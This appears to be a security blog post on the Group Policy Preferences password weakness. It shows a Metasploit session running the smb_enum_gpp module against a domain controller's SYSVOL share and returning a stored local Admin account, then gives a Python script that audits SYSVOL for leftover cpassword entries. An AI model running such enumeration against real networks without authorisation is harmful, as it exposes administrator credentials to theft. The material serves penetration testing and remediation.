Group Policy Preferences (GPP) Pwned

How to enumerate GPP credentials as a domain user with access to the SMB share on the DC.

Over the past few months I’ve had a chance to clean up some code that we’ve used internally for penetration testing for some time now. This code was built to demonstrate the weaknesses of using Group Policy Preferences (GPP) to store and distribute local or domain credentials.

Group Policy Preferences is a mechanism that system administrators can use to create new accounts and/or update account credentials on domain-joined systems. The problem with this mechanism is two-fold. First, Microsoft encrypts the stored GPP credentials with a single, non-unique secret key: the same key is used by every Windows 2008 Domain Controller (DC). Second, Microsoft published that secret key on MSDN, so anyone who knows the key can decrypt any stored credential they find.

Microsoft has since published a blog post alerting administrators to the risks of using GPP to manage credentials. Ordinary domain user credentials are all that is required to read the SYSVOL SMB share (where the GPP XML files live on the DC). With that access, we can read the GPP XML files and decrypt the stored credentials using the published secret key.

We have found that many organizations store local admin, domain service, and even Domain Admin account credentials using GPP. The module that I submitted to the Metasploit GitHub repository enumerates GPP credentials as a domain user with access to the SYSVOL share on the DC. Extracted credentials are stored in the Metasploit creds table.

[code]
msf > use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set SMBUSER jsmith
SMBUSER => jsmith
msf auxiliary(smb_enum_gpp) > set SMBPASS Password1!
SMBPASS => Password1!
msf auxiliary(smb_enum_gpp) > set SMBDOMAIN ACME
SMBDOMAIN => ACME
msf auxiliary(smb_enum_gpp) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf auxiliary(smb_enum_gpp) > show options

Module options (auxiliary/scanner/smb/smb_enum_gpp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     10.10.10.10      yes       The target address range or CIDR identifier
   RPORT      445              yes       The Target port
   SMBDomain  ACME             no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBSHARE   SYSVOL           yes       The name of the share on the server
   SMBUser    jsmith           no        The username to authenticate as
   STORE      true             no        Store the enumerated files in loot.
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_enum_gpp) > run

[...snip...]

NAME               VALUE
----               -----
TYPE               Groups.xml
USERNAME           Admin
PASSWORD           REDACTED!
DOMAIN CONTROLLER  10.10.10.10
DOMAIN             acme.com
CHANGED            2010-01-01 12:00:00
NEVER_EXPIRES?     1
DISABLED           0
[/code]
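As an added, defender-side counterpart to the module (this is example code, not part of the original post or of Metasploit): the script below walks a SYSVOL tree, parses the same preference XML files the module reads, and reports every item that still carries a cpassword attribute, with the account, change date, never-expires and disabled fields the module prints. The GPO GUIDs, file paths and XML content are constructed samples, and only the Python standard library is used.

```python
"""Audit SYSVOL for GPP XML files that still carry a cpassword attribute (added
example, not the Metasploit module; the sample paths and XML are constructed)."""
import os
import xml.etree.ElementTree as ET
# Preference files that can embed cpassword, and the attribute naming the account.
GPP_FILES = {"Groups.xml": "userName", "Services.xml": "accountName",
             "ScheduledTasks.xml": "runAs", "DataSources.xml": "username",
             "Drives.xml": "username", "Printers.xml": "username"}

def audit_xml(rel_path, xml_doc):
    """One finding per preference item whose <Properties> carries cpassword."""
    parts = rel_path.replace("\\", "/").split("/")   # .../Policies/{GUID}/.../X.xml
    gpo = next((p for p in parts if p.startswith("{")), "?")
    name_attr = GPP_FILES[parts[-1]]
    findings = []
    for item in ET.fromstring(xml_doc):              # <User>, <NTService>, <Task>, ...
        props = item.find("Properties")
        if props is None or "cpassword" not in props.attrib:
            continue
        findings.append({"gpo": gpo, "type": parts[-1],
                         "account": props.get(name_attr, ""),
                         "changed": item.get("changed", ""),
                         "never_expires": props.get("neverExpires") == "1",
                         "disabled": props.get("acctDisabled") == "1"})
    return findings

def audit_sysvol(root):
    """Walk a SYSVOL tree (or an offline copy of it) and collect every finding."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname in GPP_FILES:
                full = os.path.join(dirpath, fname)
                with open(full, "rb") as fh:
                    found.extend(audit_xml(os.path.relpath(full, root), fh.read()))
    return found

# Constructed sample: Groups.xml storing a local Admin password (flagged) and a
# Services.xml whose service runs as LocalSystem with no cpassword (clean).
SAMPLE = {
    "acme.com/Policies/{11111111-2222-3333-4444-555555555555}/Machine/Preferences/Groups/Groups.xml":
        '<Groups><User name="Admin" changed="2010-01-01 12:00:00"><Properties action="U" '
        'userName="Admin" cpassword="CONSTRUCTED_CIPHERTEXT" neverExpires="1" '
        'acctDisabled="0"/></User></Groups>',
    "acme.com/Policies/{22222222-3333-4444-5555-666666666666}/Machine/Preferences/Services/Services.xml":
        '<NTServices><NTService name="Spooler" changed="2011-02-02 08:00:00">'
        '<Properties serviceName="Spooler" accountName="LocalSystem"/></NTService></NTServices>',
}

def run_sample():
    return [f for rel, doc in SAMPLE.items() for f in audit_xml(rel, doc)]
```

Point audit_sysvol at a mounted SYSVOL share or a local snapshot of it; every finding identifies a GPO whose stored credential should be removed and whose account password should be rotated.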
